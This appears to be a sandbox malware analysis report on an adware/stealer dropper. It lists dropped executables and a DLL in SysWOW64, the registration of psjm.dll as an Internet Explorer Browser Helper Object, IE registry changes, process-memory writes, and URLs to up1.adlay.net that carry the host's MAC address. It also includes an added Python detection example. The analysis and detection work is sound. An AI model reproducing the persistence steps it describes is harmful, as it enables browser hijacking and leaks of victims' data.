Malware Analysis Report

2025-01-18 21:27

Sample ID 240321-vvh35seg5z
Target dc2f1aa97d98d83b66f0d5253bb41165
SHA256 ebf662eb519aa12b8a23b9088490eaf8a45101314faf5496898f2c327e705e72
Tags
adware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

ebf662eb519aa12b8a23b9088490eaf8a45101314faf5496898f2c327e705e72

Threat Level: Shows suspicious behavior

The file dc2f1aa97d98d83b66f0d5253bb41165 shows suspicious behavior (score 7/10): it drops two executables and a DLL into a new SysWOW64\4875 directory and runs them, registers the dropped psjm.dll as an Internet Explorer Browser Helper Object through regsvr32, and starts Internet Explorer on up1.adlay.net URLs that carry the host's MAC address as a query parameter.

Malicious Activity Summary

adware stealer

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Installs/modifies Browser Helper Object

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-21 17:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-21 17:18

Reported

2024-03-21 17:21

Platform

win7-20240221-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\4875\Winspss.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\WINDOWS\SysWOW64\4875\Winspss.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker_Charm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker.ini C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\Windows\SysWOW64\psjm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20053ad6b37bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417203387" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0D79C1B1-E7A7-11EE-9F01-52C7B7C5B073} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value omitted) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000566a0e7b8e772887c04882c47cfc98463016a73d7514a879cf1a4e8f4180018a000000000e80000000020000200000000a42c1dba94c9050217f18ea7c062d2c49f7beff334b5297f597de48d0e8a7c0200000004aae2468b2ff3bc05fc3845f5c83445b8b5b940bf4970576691d69c0f6e857494000000093d57fab261d7901d49d30a91b38ef36a88741750a959deeb9dc23d3030bddbd288639409cf7d004c6f2a8a7d4ffb21494ae151fe4c4efb4e683bc43b6b05f81 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID\ = "new.myb" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib\ = "{5399FC70-D920-4d82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR\ = "C:\\Windows\\SysWOW64" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\ = "s 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ = "noep Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ = "C:\\Windows\\SysWOW64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
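The "Installs/modifies Browser Helper Object", "Drops file in System32 directory" and "Modifies registry class" tables above are three views of one persistence step: the dropper writes psjm.dll to SysWOW64, regsvr32 runs the DLL's DllRegisterServer, which writes the CLSID {FF71FF86-04AC-4cb2-A35A-1262BF791A01} with InprocServer32 pointing at psjm.dll, and the same CLSID is then listed under Browser Helper Objects so Internet Explorer loads it on every start. The following Python is an added example written for this report, not sandbox output; it shows detection logic that joins those three event types (Sysmon would carry them as EventID 11, 12 and 13) into a single finding. The first four events are constructed from the rows above; the fifth is an invented benign COM registration included for contrast, and the severity rule is this example's own assumption.

```python
"""Join BHO key creation, CLSID InprocServer32 data and the file write of
the registered DLL into one finding.  Added example for this report,
not sandbox output; events are constructed from the rows in the report
plus one invented benign registration."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "file_created" | "key_created" | "set_value"
    path: str          # file path, or registry key path
    process: str       # image that performed the write
    data: str = ""     # value data for set_value (the key's default value)


MALWARE = r"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"
REGSVR32 = r"C:\Windows\SysWOW64\regsvr32.exe"
BHO_CLSID = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}"
BHO_ROOT = r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects"


def inproc_key(clsid, wow6432=True):
    """Registry path of a CLSID's InprocServer32 key (32-bit view by default)."""
    parts = [r"\REGISTRY\MACHINE\SOFTWARE\Classes"]
    parts += ["Wow6432Node"] if wow6432 else []
    parts += ["CLSID", clsid, "InprocServer32"]
    return "\\".join(parts)


EVENTS = [
    Event("file_created", r"C:\Windows\SysWOW64\psjm.dll", MALWARE),
    Event("key_created", inproc_key(BHO_CLSID), REGSVR32),
    Event("set_value", inproc_key(BHO_CLSID), REGSVR32, r"C:\Windows\SysWOW64\psjm.dll"),
    Event("key_created", BHO_ROOT + "\\" + BHO_CLSID, REGSVR32),
    # Constructed benign contrast (not from the report): a COM server
    # registered by an installer and never listed as a BHO.
    Event("set_value", inproc_key("{11111111-2222-3333-4444-555555555555}", wow6432=False),
          r"C:\Windows\System32\msiexec.exe", r"C:\Program Files\Vendor\vendor.dll"),
]

BHO_KEY = re.compile(r"\\CurrentVersion\\Explorer\\Browser Helper Objects\\(\{[0-9A-F-]{36}\})$", re.IGNORECASE)
INPROC_KEY = re.compile(r"\\Classes\\(?:Wow6432Node\\)?CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32$", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Downloads)\\", re.IGNORECASE)


def detect_bho(events):
    """One finding per BHO CLSID registered in `events`, enriched with the
    DLL that CLSID loads and the process that dropped the DLL."""
    inproc, writers = {}, {}
    for e in events:
        if e.kind == "file_created":
            writers[e.path.lower()] = e.process
        elif e.kind == "set_value":
            m = INPROC_KEY.search(e.path)
            if m:
                inproc[m.group(1).upper()] = (e.data, e.process)
    findings = []
    for e in events:
        m = BHO_KEY.search(e.path) if e.kind == "key_created" else None
        if not m:
            continue
        clsid = m.group(1).upper()
        dll, registrar = inproc.get(clsid, ("<InprocServer32 not seen>", e.process))
        dropper = writers.get(dll.lower())
        findings.append({
            "clsid": clsid,
            "dll": dll,
            "registered_by": registrar,
            "dropped_by": dropper,
            # Assumed severity rule: a BHO whose DLL was written by a process
            # running from a user-writable directory is escalated.
            "severity": "high" if dropper and USER_WRITABLE.search(dropper) else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_bho(EVENTS):
        print(f)
```

The regex accepts both the Wow6432Node and the native CLSID path because the 64-bit iexplore.exe would load a 64-bit BHO registered without the Wow6432Node prefix. The benign msiexec registration produces no finding because nothing lists its CLSID under Browser Helper Objects; the BHO key, not the COM registration, is the signal.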

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2768 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 2064 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2768 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
